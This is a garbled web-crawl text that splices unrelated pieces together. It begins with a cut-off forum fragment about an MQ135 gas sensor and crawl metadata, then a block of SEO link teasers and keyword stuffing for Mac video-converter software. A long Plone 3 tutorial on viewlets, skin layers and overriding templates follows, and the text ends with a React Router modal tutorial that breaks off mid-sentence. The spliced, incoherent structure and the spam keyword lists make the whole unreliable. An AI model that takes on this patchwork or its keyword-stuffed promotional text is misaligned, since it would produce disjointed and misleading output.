b and Ro as well as a real value of CO2 ppm measured with a MQ135. The downside of this of course is the difficulty to provide a known value of ppm for the calibration for other gas like e.g. Ch4, but if I claim I'm showing a ppm value, I want to be sure this is a real ppm The code is here, within the dev branch of NodeManager, any feedback would be appreciated!
https://forum.mysensors.org/topic/4813/gas-sensor/
CC-MAIN-2019-39
refinedweb
2,257
56.59
How to convert JVC MOD to AVI on Mac with Mac MOD to AVI Converter MOD to AVI Converter for Mac is best conversion software for you to convert MOD to AVI, MP4, WMV, MPEG, iPod, iPhone, etc. on Mac OS, and you will never complain about how to play your MOD files on Mac. -mac.htm TS to MOV on Mac - How to use Mac TS to MOV Converter to convert TS to MOV on Mac? Mac TS to MOV Converter is a multifunction device, it will help you transform Ts format to FLV, MKV, MOV, WMV, ASF, MPEG1, MPEG2, MP4, 3GP, 3G2, AVI, TOD, MP3, etc. mac.htm Mac VRO to FCE Converter - How to import VRO files to Final Cut Express on Mac Mac VRO to Final Cut Express Converter enables you convert VRO to FCE supported format and after conversion you can import VRO to FCE on Mac. -mac.htm Mac VRO to iMovie Converter - How to import VRO to iMovie for editing on Mac? Mac VRO to iMovie Converter can help you convert VRO to iMovie and import .vro files into iMovie on Mac. -on-mac.htm How to convert MOV files to MPEG/MPG on Mac You can easily convert MOV to MPEG or convert MOV to MPG on Mac with Mac MOV to MPEG/MPG Converter and enjoy the videos on Mac. n-mac.htm How to convert QuickTime MOV files to FLV on Mac OS X Mac MOV to FLV Converter is an ideal software enables you convert MOV to FLV on Mac so that you can enjoy the videos. -mac.htm Mac MOV to WMV Converter - How to convert QuickTime MOV to WMV on Mac OS X This MOV to WMV Converter can help you convert MOV to WMV on Mac so that you can enjoy the videos. -mac.htm Mac MOV to AVI Converter - How to convert MOV to AVI on Mac with MOV to AVI Converter for Mac Mac MOV to AVI Converter allows you convert MOV to AVI on Mac so that you can share MOV videos with friends. -mac.htm Mac MOV to MP4 - How to convert MOV to MP4 on Mac (Snow Leopard) Free guide for you to convert MOV files to MP4 format on Mac, then you can play MOV files on your digital players like iPod, PSP. -mac.htm MOV format converter, how to play and convert MOV files on Mac This is teach you how to play MOV files and convert MOV files by using Mac MOV Video Converter. .htm .mov to .wmv mac convert mac mov to avi convert mov on mac convert mov to avi convert mov to flv convert mov to mpeg convert mov to mpg mac convert mov to wmv convert mov to wmv mac converting mov to avi converting mov to mp4 mac fce import vro mac final cut express imovie import vro import vro to fce import vro to imovie importing vro to imovie mac .mov to .avi mac .mov to .mp4 mac mov files mac mov to avi mac mov to flv mac mov to mpeg mac mov to mpeg/mpg mac mov to mpg mac mov to wmv mac vro to fce mac vro to imovie mov to avi mov to avi mac mov to flv mov to flv converter mac mov to mp4 converter mac mov to mp4 for mac mov to mp4 mac mov to wmv mpg to mov mac play mov on mac software vro to fce
http://www.jumptags.com/appletv1985/
crawl-003
refinedweb
585
69.08
DELETE method 36 * <p> 37 * The HTTP DELETE method is defined in section 9.7 of 38 * <a href="">RFC2616</a>: 39 * <blockquote> 40 * The DELETE method requests that the origin server delete the resource 41 * identified by the Request-URI. [...] The client cannot 42 * be guaranteed that the operation has been carried out, even if the 43 * status code returned from the origin server indicates that the action 44 * has been completed successfully. 45 * </blockquote> 46 * 47 * @since 4.0 48 */ 49 @NotThreadSafe // HttpRequestBase is @NotThreadSafe 50 public class HttpDelete extends HttpRequestBase { 51 52 public final static String METHOD_NAME = "DELETE"; 53 54 55 public HttpDelete() { 56 super(); 57 } 58 59 public HttpDelete(final URI uri) { 60 super(); 61 setURI(uri); 62 } 63 64 /** 65 * @throws IllegalArgumentException if the uri is invalid. 66 */ 67 public HttpDelete(final String uri) { 68 super(); 69 setURI(URI.create(uri)); 70 } 71 72 @Override 73 public String getMethod() { 74 return METHOD_NAME; 75 } 76 77 }
http://hc.apache.org/httpcomponents-client-4.3.x/httpclient/xref/org/apache/http/client/methods/HttpDelete.html
CC-MAIN-2014-10
refinedweb
160
58.32
Plone 3 has switched to use Zope 3 viewlet components instead of the old macro include approach. This tutorial intends to teach you what viewlets and viewlet managers are, and how you can play with them in the context of adding a new theme to a Plone 3.0 site. Even if it is or will be possible to go through all the steps that will be demonstrated in this tutorial from a Through The Web interface, the purpose here is to show how it is possible to achieve the given goals programmatically, from a Python product that lives on the filesystem. So let's dig right into the code and have a look at the main_template template of Plone, which is the template that aggregates the page regions that are rendered around the content region of a Plone page (i.e. the header, the footer, and the two side columns): In main_template.pt, which resides in $INSTANCE_HOME/Products/CMFPlone/skins/plone_templates/, we can see that the content of the <div /> region with id portal-top contains three lines of code. In versions of Plone previous to 3.0, it used to contain a whole list of macro calls for rendering the site wide actions, the quick search box, the logo, the global sections, the personal bar and breadcrumbs, etc.. For the example that I want to show, the old portion of the main_template.pt file used to look like this (in CMFPlone prior to 3.0): <div id="portal-top" i18n: <div id="portal-header"> <p class="hiddenStructure"> <a accesskey="2" tal:Skip to content.</a> | <a accesskey="6" tal:Skip to navigation</a> </p> <div metal: Site-wide actions (Contact, Sitemap, Help, Style Switcher etc) </div> <div metal: The quicksearch box, normally placed at the top right </div> <a metal: The portal logo, linked to the portal root </a> <div metal: The skin switcher tabs. Based on which role you have, you get a selection of skins that you can switch between. </div> <div metal: The global sections tabs. (Welcome, News etc) </div> </div> <div metal: The personal bar. (log in, logout etc...) </div> <div metal: The breadcrumb navigation ("you are here") </div> </div> Where it now looks like this: <div id="portal-top" i18n: <div tal: </div> The provider TAL expression is a Zope 3 expression which looks up a content provider from a page template. In the Zope 3 world (since Zope 3.2), a content provider is a component that generates a portion of an HTML page. Like Zope 3 views, content providers are multi adapters that adapt the context and the request. Content providers additionally adapt the view they are looked up from. Viewlets are content providers, they are small components of a page that render a small piece of HTML code. In Plone templates, viewlets are not looked up directly though. In order to be able to organize viewlets with a maximum of flexibility, they are aggregated in viewlet managers. A viewlet manager is also a Zope 3 content provider, which renders a set of viewlets that are registered for it. In the further chapters of this tutorial, I will do my best to teach you more about what viewlets and viewlet managers are, what you can do with them and what are the advantages of this approach. If you still feel that you need more input on the subject, you should read the dedicated section of Philipp's book (Web Component Development with Zope 3 - 2d. edition, chapter 10.4). I also found this .. _very good blog entry: where Jeff Shell gives a more extensive description of content providers and viewlets in the context of developing a pure Zope 3 application. Viewone Defaultone Default). Reordering and Hiding viewlets How to simply change the viewlets behavior from a Generic Setup Profile. We saw in the previous paragraph that viewlets ordering is stored in a utility. That utility is set up from the viewlets.xml file of a Generic Setup profile. Ordering If all you need is to reorder the viewlets in the Plone Default skin, you can simply copy the original viewlets.xml from CMFPlone/profiles/default/ into MyTheme/profiles/default/, and edit the copied file to make it reflect your needs. But you may want to order viewlets with more flexibility. Be happy: there are handy parameters for each node in viewlets.xml. Let's see how would look a viewlets.xml file for a 3rd party theme product: <?xml version="1.0"?> <object> <order manager="plone.portalheader" skinname="My Theme" based- <viewlet name="plone.logo" insert- </order> <order manager="plone.portaltop" skinname="*"> <viewlet name="plone.app.i18n.locales.languageselector" insert- </order> </object> The above code contains two <order /> declarations: The first one creates a new skin named My Theme which is based on the Plone Default one. This means that the new skin inherits from the viewlets ordering of the skin it is based on. In our example, the plone.logo is moved at the first position in the plone.portalheader viewlet manager. The second declaration moves plone.app.i18n.locales.languageselector right after plone.path_bar in the plone.portaltop viewlet manager for all skins (notice the skinname="*" statement). - Note Both DIYPloneStyle and ZopeSkel add a viewlets.xml file when generating a blank theme product (use --add-viewlet-example with the DIYPloneStyle generator script). For your convenience, you can find inline documentation about the parameters that can be used in the generated file (It is an option with ZopeSkel, answer 'True' when it asks for it). Hiding Hiding a viewlet is also done from the viewlets.xml with the <hidden /> node which is at same level as <order />, and is done per skin selection. For instance, if you need to remove the global sections for your skin, you'd have to add some declaration like the following one to viewlets.xml: <hidden manager="plone.portalheader" skinname="My Theme"> <viewlet name="plone.global_sections" /> </hidden> Unhiding If, for any reason, you need to unhide one or more viewlets for a given viewlet manager, you can make use of the purge and remove node parameters in your <hidden /> declaration in viewlets.xml. To unhide all hidden viewlets for a given viewlet manager: <?xml version="1.0"?> <object> <hidden manager="plone.portalheader" skinname="Plone Default" purge="True" /> </object> To unhide specific viewlet(s): <?xml version="1.0"?> <object> <hidden manager="plone.portalheader" skinname="Plone Default"> <viewlet name="plone.global_sections" remove="True" /> </hidden> </object> - Note - The purge and remove node parameters are also supported inside the <order /> declaration. Nothing that difficult here ;-) Adding a viewlet How to add a viewlet and still have several skins living in peace. Hiding and reordering viewlets within a viewlet manager is something we can do, we now have to cover how to add a new one. Example First, lets have a look at one of the examples that are shipped with DIYPloneStyle (version 3.0 is out, still beta but useable) in order to have a better understanding of the machinery: The credits_viewlet product that is located in DIYPloneStyle/example/ adds a new viewlet to the portal footer region. In the credits_viewlet code, in its browser/ folder, we have a set of files: - browser/ - __init__.py - configure.zcml - interfaces.py - logo.pt - viewlets.py - __init__.py - This is an empty file, that is here simply to make browser a python package. - configure.zcml - The file where all Zope 3 configuration is defined for browser. - interfaces.py - We'll need this file a bit later, I leave it where it is for now. - logo.pt - The template that will replace the original HTML code in the main template. - viewlets.py - The file that stores viewlet Python classes. In the same DIYPloneStyle/example/credits_viewlet subfolder, we find the profiles/ repository that stores the Generic Setup configuration files: skins.xml and viewlets.xml. Practice Let's get back to our own MyTheme product and reproduce the example we just had a look at. Viewlet registration In order to create our new viewlet, we'll have to write a viewlet class in MyTheme/browser/viewlets.py (that renders the MyTheme/browser/credits.pt template), and register it for the viewlet manager we want it to show in (from MyTheme/browser/configure.zcml). Then we'll have to order it at the place we want it to show within the viewlet manager (in MyTheme/profiles/default/viewlets.xml). - Note - If you generate your theme product with DIYPloneStyle, you have to use the --add-viewlet-example option while calling the generator script in order to have the viewlet base code included in your project. The plone3_theme from ZopeSkel includes viewlet base code by default. We have to edit the following files… MyTheme/browser/__init__.py: This is an empty but needed file that makes browser/ a python package. In MyTheme/browser/viewlets.py: from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile from plone.app.layout.viewlets.common import ViewletBase DESIGNER = 'John Doe' class CreditsViewlet(ViewletBase): render = ViewPageTemplateFile('credits.pt') def update(self): # set here the values that you need to grab from the template. # stupid example: self.designer = DESIGNER In MyTheme/browser/credits.pt: <div id="design-credits" i18n: <span i18n:Design by: <span tal:Terry Gilliam</span>.</span> </div> In MyTheme/browser/configure.zcml: <configure xmlns="" xmlns: <browser:viewlet </configure> Don't forget to include the browser package in MyTheme/configure.zcml: <configure xmlns="" xmlns: <include file="profiles.zcml" /> <include package=".browser" /> </configure> In MyTheme/profiles/default/viewlets.xml: <?xml version="1.0"?> <object> <order manager="plone.portalfooter" skinname="Credits Viewlet Theme" based- <viewlet name="example.credits" insert- </order> </object> We can register our new skin from MyTheme/profiles/default/skins.xml: <?xml version="1.0"?> <object name="portal_skins"> <skin-path </object> Now we can restart Zope and install our product in Plone. No problem so far, after restarting Zope, installing our product in Plone, and refreshing the portal home page, we see that the footer region has been modified and now displays, in addition to its default content, a message telling who owns credits for the site design. Skin layer Now let's go, as portal manager, to Site Setup > Themes in the Plone interface, and select Plone Default as default theme. After refreshing the portal home page, we see that the credits viewlet is still rendered by the bottom of the page, which is not what we want. We must find a way to make the credits viewlet render only for the skin it was designed for. We could hide it for all other themes from the viewlets.xml Generic Setup file with the <hidden /> node, but that won't work if you want to design a distributable product. You never know what other theme(s) could be installed on any portal that will have yours installed on. We can register a viewlet only for one theme (one skin selection) thanks to the plone.theme package. Thanks to plone.theme, we can set a Zope 3 skin layer that corresponds to a skin selection in portal_skins (a theme). In order to set that skin layer up, add or edit the following files in the browser/ folder in our MyTheme product: MyTheme/browser/interfaces.py: from plone.theme.interfaces import IDefaultPloneLayer class IThemeSpecific(IDefaultPloneLayer): """Marker interface that defines a Zope 3 skin layer bound to a Skin Selection in portal_skins. """ It is not needed to rename that interface class if you have more than one theme product. There will be no clash with other products holding the same interface in their own browser/ directories. MyTheme/browser/configure.zcml: <configure xmlns="" xmlns: <interface interface=".interfaces.IThemeSpecific" type="zope.publisher.interfaces.browser.IBrowserSkinType" name="My Theme" /> <browser:viewlet </configure> Note the interface declaration for the Zope 3 skin layer, and the layer parameter for the viewlet itself. The value for the name parameter in the interface declaration must be the name of the theme added by MyTheme (also known as skin name), as seen in the Site setup > Themes Plone control panel. The value for the layer attribute in the viewlet declaration must be the interface that is used to define the skin layer. After restarting Zope (or refreshing our product), and reloading the portal home page, we can see that the Plone Default theme doesn't show our viewlet up anymore. Cool :-) Overriding a template viewlet How to use Zope 3 technology to override a viewlet with template definition. In the previous chapters of this tutorial we learned how to add a viewlet to a viewlet manager for a specific theme, and how to hide a viewlet from a viewlet manager in a specific theme. By combining these two techniques we should be able to override a default Plone viewlet with a custom one for a specific theme. It shouldn't be that different than hiding the targeted Plone viewlet and adding/positioning a custom one. Actually, it is different, and simpler. Theory The key concept here is the use of a Zope 3 skin layer. We saw in the previous chapter how to make use of a Zope 3 skin layer to make sure that the viewlet we added to our theme would not render in any other one. In this chapter we will make use of the same skin layer to override a default Plone viewlet with a custom one. Principle is this: In our product (or package), we declare in configure.zcml a viewlet that has the same name as one of the Plone default viewlets, but with a different constructor class or template than the original one (We can use a template even if the original declares a class and vice and versa). By using the layer attribute in the custom viewlet zcml declaration, we register the viewlet for a Zope 3 skin layer. That skin layer has the same name as the name of the theme that is added to the portal_skins tool. Zope 3 skin layers are bound to skin selections in portal_skins (themes) thanks to the plone.theme package. Which means that a skin layer is applied if its name matches the name of the selected skin in portal_skins. A viewlets that is registered for a skin layer is rendered when that layer is applied, and overrides any other viewlet that has the same name but which is not registered for that layer. Practice Let's see how we can apply this viewlet overriding within MyTheme, the product that we started to develop in the previous chapters. Our goal here is to have the footer rendering a different text than the default Plone one in our theme. 1. Creating/Registering the Zope 3 skin layer Both ZopeSkel and DIYPloneStyle generate code that defines the skin layer interface in MyTheme/browser/interfaces.py. The interface class is named IThemeSpecific and inherits from plone.theme.interfaces.IDefaultPloneLayer. The plone3_theme template of ZopeSkel generates a package which includes a browser/ directory and a Zope 3 skin layer by default. That is not the case with the generator script of DIYPloneStyle. In order to have a Zope 3 skin layer added to a product generated with DIYPloneStyle, you have to run the script with the option --add-viewlet-example. If you already generated your product with DIYPloneStyle without the --add-viewlet-example option, see in the previous chapter how to add the skin layer manually. 2. Identifying which viewlet to override We have to identify which viewlet we want to override, and for which viewlet manager it is registered. Plone ships with a basic user interface for reordering and hiding/showing viewlets inside their viewlet managers. To access that configuration page, point your browser to the URL (or equivalent based on your Zope/Plone installation). The viewlets management page should look like this one (rendered with the Plone Default theme): By the end of that page, we can identify the footer region, and note that it is rendered by a viewlet manager called plone.portalfooter. We can also see that two viewlets are registered with plone.portalfooter: plone.footer and plone.colophon. plone.footer is our target: it is the one that we want to see rendered differently in our theme. 3. Write the code that renders the viewlet Now that we know which viewlet we want to override, let's have a look at its code in our Plone installation on the file system. Plone default viewlets are declared in the plone.app.layout.viewlets package. Most of the time, that package can be found in $INSTANCE_HOME/lib/python/plone/app/layout/view. Inside the plone.app.layout.viewlets package, we see in configure.zcml where is the code that renders the default plone.footer viewlet in the Plone Default theme. We find the default footer viewlet declaration by the end of the file: <!-- Footer --> <browser:viewlet We note that this viewlet isn't rendered by a Zope 3 view but directly from a template, which name is footer.pt. We can make a copy of that template in the browser/ directory of MyTheme. No need to give it a different name. Edit the template to make it render a different text than the one in the Plone Default theme, for instance: <div id="portal-footer" i18n: <p> <span i18n: Design by <span i18n: <a href="">John Doe</a> </span>. </span> </p> </div> 4. Register the custom viewlet in configure.zcml In order to register the template with the portal footer viewlet manager, we simply copy the portion of ZCML code that we found in lib/python/plone/app/layout/viewlets/configure.zcml (see upper in this page) into MyTheme/browser/configure.zcml, and we edit it to make sure it uses the right interfaces for the manager and the Zope 3 skin layer: <!-- The customized footer --> <browser:viewlet 5. Done That's all, we can now restart Zope, install the new theme from Site Setup > Add-on Products in the Plone interface, and reload the portal front page (or any other page) to see the result in the footer region. Other example Another example of viewlet overriding can be found in DIYPloneStyle/example/custom_footer/. It is quite easy to understand and should be self explanatory now that you read most of this chapter. This example is slightly different than the one we just covered though: the new viewlet uses a Zope 3 browser view for its rendering. Principles are the same anyway. The product layout on the file system is also a bit different than the one typically found in a product generated by DIYPloneStyle or ZopeSkel. All viewlet code is kept at first level package in a browser.py module. There is no browser sub-package (folder). This is for showing that there is more than one only possible layout for organizing a plone theme package/product. - In browser.py, we find IThemeSpecific, the interface of the Zope 3 skin layer, and FooterViewlet, the viewlet class that overrides the default plone one. - footer.pt is the template rendered by FooterViewlet. - profiles/default/ is the usual Generic Setup profile for the product. - The interface, the viewlet and the product Generic Setup profile are all declared in a single configure.zcml. And now… happy customizing! Overriding a class viewlet How to use Zope 3 technology to override a viewlet with class definition. In the previous chapter we have learned how to override a viewlet that has a template in it's definition. But there are a lot of viewlets in Plone that have a python class in their definitions instead of a simple template. So, let's have a look how to customize such viewlet. The steps for overriding a class viewlet do not differ from what you have learned in the previous chapter a lot. So, let's just cover the practical points of our use case. Introduction We suppose you are already familiar with how to find the viewlet you want to override, using @@manage-viewlets view from the previous chapter. For this particular example let's override plone.path_bar viewlet that is managed by plone.portaltop viewlet manager. It's the viewlet that renders a path bar (better known as the breadcrumbs) below the global navigation. In this example we will get rid of "You are here:" text in plone.path_bar viewlet. 1. Code that renders the viewlet Let's have a look at how this viewlet is declared in configure.zcml inside the plone.app.layout.viewlets package: <!-- The breadcrumbs --> <browser:viewlet As you can see this viewlet is rendered by a Zope 3 view, defined in common.PathBarViewlet class inside the plone.app.layout.viewlets package. Here is how this class looks like: class PathBarViewlet(ViewletBase): render = ViewPageTemplateFile('path_bar.pt') def update(self): portal_state = getMultiAdapter((self.context, self.request), name=u'plone_portal_state') self.navigation_root_url = portal_state.navigation_root_url() self.is_rtl = portal_state.is_rtl() breadcrumbs_view = getMultiAdapter((self.context, self.request), name='breadcrumbs_view') self.breadcrumbs = breadcrumbs_view.breadcrumbs() We are not going to edit standard behavior of the viewlet in this example. The only thing we want is getting rid of "You are here:" text. Thus render = ViewPageTemplateFile('path_bar.pt') is exactly what we are interested in. 2. Customize the viewlet's template render = ViewPageTemplateFile('path_bar.pt') line defines the page template for plone.path_bar viewlet. You can find path_bar.pt template inside the plone.app.layout.viewlets package. Let's make a copy of this template in the browser/ directory of MyTheme. No need to give it a different name. Edit the template to remove the text we do not need: <div id="portal-breadcrumbs" i18n: <!-- We use a comment to show what part we remove <span id="breadcrumbs-you-are-here" i18n: You are here: </span> --> <a i18n:Home</a> <span tal: <tal:ltr→</tal:ltr> <tal:rtl»</tal:rtl> </span> <span tal:repeat="crumb view/breadcrumbs" ... </span> </div> Now we need to make the plone.path_bar viewlet use this template for rendering. 3. Overriding a class that renders the template Since ZCML declaration for plone.path_bar in lib/python/plone/app/layout/viewlets/configure.zcml uses a class instead of a simple template the core of customization is overriding that class also. For doing this we will simply subclass the default viewlet's class and apply our changes, so that they could override default ones. You have seen the default class used for this viewlet in p.1 above in this page. So, to subclass PathBarViewlet class we should add a new viewlets.py into MyTheme/browser/. This will be the place where you override classes, used for viewlets. Add the following to your viewlets.py: from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile from plone.app.layout.viewlets import common class PathBarViewlet(common.PathBarViewlet): """A custom version of the path bar class """ render = ViewPageTemplateFile('path_bar.pt') As you can see we create a new class PathBarViewlet, that is a subclass of common.PathBarViewlet - default class for the plone.path_bar viewlet. The only thing we need to override is the template used for rendering the viewlet. We already have customized path_bar.pt inside MyTheme/browser/, thus our new class reffers to our customized template. 3.1 Theme Compatibility Between Different 3.x Versions of Plone Version 1.1.3 of the plone.app.layout egg was released in July of 2008. As of this version, the viewlet template is controlled via the 'index' attribute rather than 'render', because 'index' can be overridden by using the ZCML template attribute, removing the need for a special viewlet subclass. If you need to make a subclass anyway, you can continue to use the render directive as mentioned above if you want to, or you can use "index" instead, like this: from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile from plone.app.layout.viewlets import common class PathBarViewlet(common.PathBarViewlet): """A custom version of the path bar class """ index = ViewPageTemplateFile('path_bar.pt') If you're going to distribute your theme and need to maintain backwards compatibility with the Plone 3.0.x series, additional code needs to be included. You should add the following lines that make the render method defer to the 'index' attribute. (This is done in ViewletBase in Plone 3.1.x, but not in Plone 3.0.x.): from plone.app.layout.viewlets import common class PathBarViewlet(common.PathBarViewlet): """A custom version of the path bar class """ def render(self): # defer to index method, because that's what gets overridden by the template ZCML attribute return self.index() index = ViewPageTemplateFile('path_bar.pt') Otherwise, themes created with newer versions of plone.app.layout will not be compatible with older versions of Plone. That's it with the class. In case you need to customize not only the template, but viewlet's behavior - this is the right place to do so. So far so good - we have the customized class, that uses the customized template. Now we need to register these customizations with MyTheme/browser/configure.zcml 4. Register the custom viewlet in configure.zcml In order to register the customized class with the plone.path_bar viewlet, we simply copy the portion of ZCML code that we found in lib/python/plone/app/layout/viewlets/configure.zcml (see p.1 above in this page) into MyTheme/browser/configure.zcml, and edit it to make sure it uses the right class and right interfaces for the manager and the Zope 3 skin layer: <!-- The customized breadcrumbs --> <browser:viewlet Use of layer=".interfaces.IThemeSpecific" has been explained in the previous chapter. name and permission remain the same as in the default viewlet declaration. Although you could change name to make it clear that this is not a standard viewlet. You could use something like "MyTheme.path_bar" as the name here. For manager we use the full dotted path to IPortalTop interface, implemented by plone.portaltop viewlet manager. And the core part of our customization - we switch class to our customized class from MyTheme/browser/viewlets.py. 5. Additional step (Only if you have changed name for viewlet in ZCML) If you have renamed your custom viewlet to "MyTheme.path_bar", you have created a new viewlet that has to be registered in your Generic Setup profile. To not have 2 path bars in your site you should also hide the default plone.path_bar viewlet. To remember how to hide existing viewlet and register the new one, please refer to page 3 of this tutorial. 6. Done Now you can restart your Zope. If you have your theme installed already, you need to reinstall it from Site Setup > Add-on Products. After all these steps you should not see "You are here:" text any more in your breadcrumbs. Get the more info : Moving?
http://plone.org/documentation/kb/customizing-main-template-viewlets/tutorial-all-pages
CC-MAIN-2013-48
refinedweb
4,445
65.83
I have the following code and feel it could be more efficient. Meaning this is 3x3 board and could be done manually but what if it were a 30x30 board or bigger? x = [[1, 2, 0],[2, 1, 0],[2, 1, 0]] for y in range (3): if ((x[0][0] == x[1][0] == x[2][0] == y) or (x[0][1] == x[1][1] == x[2][1] == y) or (x[0][2] == x[1][2] == x[2][2] == y) or (x[0][0] == x[0][1] == x[0][2] == y) or (x[1][0] == x[1][1] == x[1][2] == y) or (x[2][0] == x[2][1] == x[2][2] == y) or (x[0][0] == x[1][1] == x[2][2] == y) or (x[0][2] == x[1][1] == x[2][0] == y)): if y==1: print('Player 1 won!!!') if y==2: print('Player 2 won!!!') if y==0: print('Nobody won') You could use a function generator like this: def cell_owner(player): """returns a function which can check if a cell belongs to provided player""" def wrapped(cell): return player == cell return wrapped So you can call cell_owner(1) to get a function which accept a value and checks if it is 1. This seems useless, but with such a function you can use all and map to check a whole cells group in one line: # will return True if each cell in <cells_group> belong to <player> all(map(cell_owner(<player>), <cells_group>) Before, doing this, you can prepare a list of cells groups which are winnable and then iterate on the list applying the all/map functions to each group to determine is a player won. Below is a complete example with some extra-functions for test pupose: import random def gen_random_grid(size): """just for test purpose: generate a randomly filled grid""" return [[random.randint(0, 2) for col in range(size)] for row in range(size)] def print_grid(grid): """just for test purpose: prints the grid""" size = len(grid) row_sep = "+{}+".format("+".join(["---"] * size)) row_fmt = "|{}|".format("|".join([" {} "] * size)) print(row_sep) for row in grid: print(row_fmt.format(*row)) print(row_sep) def cell_owner(player): """returns a function which can check is a cell belongs to provided player""" def wrapped(cell): return player == cell return wrapped def get_winner(grid): """determines if there is a winner""" size = len(grid) # prepare list of potentially winning cells groups cells_groups_to_check = grid[:] # rows cells_groups_to_check += [[grid[row][col] for row in range(size)] for col in range(size)] #cols cells_groups_to_check.append( [grid[index][index] for index in range(size)]) # diag 1 cells_groups_to_check.append( [grid[index][size - 1 - index] for index in range(size)]) # diag 2 winner = 0 for y in range(1, 3): # 0 is not a player, no need to test it # for each player... for group in cells_groups_to_check: # ... check if a cells group is complete if (all(map(cell_owner(y), group))): winner = y break if winner: break return winner # generate some random grids of different sizes TEST_GRIDS = [gen_random_grid(3) for _ in range(3)] TEST_GRIDS += [gen_random_grid(2) for _ in range(3)] TEST_GRIDS += [gen_random_grid(4) for _ in range(3)] # demonstration for grid in TEST_GRIDS: print_grid(grid) print("Winner is {}".format(get_winner(grid))) Note this code should work for any size of square grid.
https://codedump.io/share/uSew5aXTbL15/1/how-to-create-a-formula-that-checks-who-won-a-tic-tac-toe-game-without-lots-of-if-statements
CC-MAIN-2017-17
refinedweb
542
52.43
Modals are very useful for displaying one view on top of another. However, they are more than an absolutely positioned <div> element wrapping everything when it comes to implementation. Especially if you need dynamic URLs, page refreshes, or a simple scrolling interaction on a mobile device. In this article, we’ll discuss the various aspects of modals and identify solutions to satisfy the requirements that come with creating dynamic URLs, page refreshes, and other features. Before starting to shape the modal component, let’s start with some basics of the react-router package. We’ll use four components from this package: BrowserRouter, Route, Link, and Switch. Since this is not a react-router tutorial, I won’t be explaining what each of these components do. However, if you’d like some info about react-router, you can check out this page. Basic routing First, go ahead and install react-router-dom through npm. npm install react-router-dom --save At the very top level of your application, use the <BrowserRouter/> component to wrap your app. import { BrowserRouter } from "react-router-dom"; ReactDOM.render( <BrowserRouter> <App /> </BrowserRouter>, document.getElementById('root') ); Inside <App/>, you’ll need to specify the routes so that you can render a specific view when one of them — or none of them — match. Let’s assume we have three different components to render: <About/> and <Contact/>. We’ll create a navigation menu, which will always be visible at the very top of the application. The <Link/> or <NavLink/> components from react-router-dom are used for navigation purposes, while <NavLink/> has the special feature of being applicable to a specific styling when the current URL matches. Functionality-wise, you can use either one. Below is the basic structure of the navigation menu, which changes the URL accordingly: render() { return ( <div className="app"> <div className="menu"> <Link className="link" to='/'>Home</Link> <Link className="link" to='/about'>About</Link> <Link className="link" to='/contact'>Contact</Link> </div> </div> ); } The next thing we’ll do is implement the mechanism that matches the URL and renders a specific component. <Switch/> renders the first matching location specified by its <Route/> children. When nothing is matched, the last <Route/> is returned — usually as a 404 page. render() { return ( <div className="app"> <div className="menu"> <Link className="link" to='/'>Home</Link> <Link className="link" to='/about'>About</Link> <Link className="link" to='/contact'>Contact</Link> </div> <Switch> <Route exact path="/" component={Home} /> <Route exact path="/contact/" component={Contact} /> <Route exact path="/about" component={About} /> <Route>{'404'}</Route> </Switch> </div> ); } Creating a modal component So far, we’ve implemented the basic routing structure. Now we can create a modal component and work on displaying it as an overlay. Although there are a variety of different methods for creating modal components, we’ll only be covering one. A modal component has a wrapper element which spans the whole screen — width and height. This area also acts as a clickedOutside detector. Then the actual modal element is positioned relative to that wrapper element. Below is an example of a <Modal/> functional component using withRouter HOC (Higher order component) to access the router history and call the goBack() method to change the application URL when the modal is closed on click to .modal-wrapper. onClick={e => e.stopPropagation()} is used to prevent propagation of the click event and trigger the onClick on .modal-wrapper, which would close the modal when the actual .modal element is activated. import React from 'react'; import { withRouter } from 'react-router-dom'; const Modal = () => ( <div role="button" className="modal-wrapper" onClick={() => this.props.history.goBack()} > <div role="button" className="modal" onClick={e => e.stopPropagation()} > <p> CONTENT </p> </div> </div> ); export default withRouter(Modal); Styling the .modal-wrapper is just as important. Below, you can find the basic styling used to make it span the whole screen and appear above the content. Using -webkit-overflow-scrolling: touch enables elastic scroll on iOS devices. .modal-wrapper { position: fixed; left: 0; top: 0; width: 100%; height: 100vh; overflow-y: scroll; -webkit-overflow-scrolling: touch; } Opening the modal view The modal component we created should render on top of the existing view when a specific URL is matched, meaning that somehow we have to change the URL so the routing mechanism can decide what to render. We know that <Switch/> renders the first matching location, but a modal overlay needs two <Route/> components rendering at the same time. This can be achieved by putting the modal <Route/> out of <Switch/> and rendering it conditionally. In this case, we should be able to detect if a modal is active or not. The easiest way to do this is by passing a state variable along with a <Link/> component. In the same way we used the <Link/> component to create the navigation menu, we’ll use it to trigger a modal view. The usage shown below lets us define a state variable, which is then made available in the location prop, which we can access within any component using withRouter HOC. <Link to={{ pathname: '/modal/1', state: { modal: true } }} > Open Modal </Link> Put this anywhere you want. Clicking the link will change the URL to /modal/1. There might be several modals with different names like modal/1, modal/2, and so on. In this case, you’re not expected to define each <Route/> intended to match the individual modal locations. In order to handle all of them under the /modal route, use the following syntax: <Route exact This gives you the flexibility of getting the value of the hardcoded :id parameter within the modal component through the match.params prop. It also lets you do dynamic content renderings, depending on which modal is open. Matching the modal location This section is particularly important because it identifies the mechanism for displaying a modal on top of an existing view even though the location parameter changes when a modal is opened. When we click the Open Modal link defined in the previous section, it will change the location path to /modal/1, which matches nothing in <Switch/>. So we have to define the following <Route/> somewhere. <Route exact path="/modal/:id" component={Modal} /> We want to display the <Modal/> component as an overlay. However, putting it inside <Switch/> would match it and only render the <Modal/> component. As a result, there would be no overlay. To resolve this problem, we need to define it both inside and outside of <Switch/> with extra conditions. Below, you’ll see the modified version of the same snippet. There are several changes. Let’s list them quickly: - There is a previousLocationvariable defined in the constructor. There is an isModalvariable defined, which depends on some other values. <Switch/>is using a locationprop. There are two <Route exact path="/modal/:id" component={Modal} />used both inside and outside <Switch/>, and the one outside is conditionally rendered. When a modal is opened, we need to store the previous location object and pass this to <Switch/> instead of letting it use the current location object by default. This basically tricks <Switch/> into thinking it’s still on the previous location — for example / — even though the location changes to /modal/1 after the modal is opened. This can be achieved by setting the location prop on <Switch/>. The following snippet replaces the previousLocation with the current location object when there is no open modal. When you open a modal, it doesn’t modify the previousLocation. As a result, we can pass it to <Switch/> to make it think we’re still on the same location, even though we changed the location by opening a modal. We know that when a modal is opened, the state variable named modal in the location object will be set to true. We can check if the state of the location object is defined and has the state variable of modal set to true. However, these two checks alone do not suffice in the case of refreshing the page. While the modal has to be closed on its own, location.state && location.state.modal still holds. Checking whether 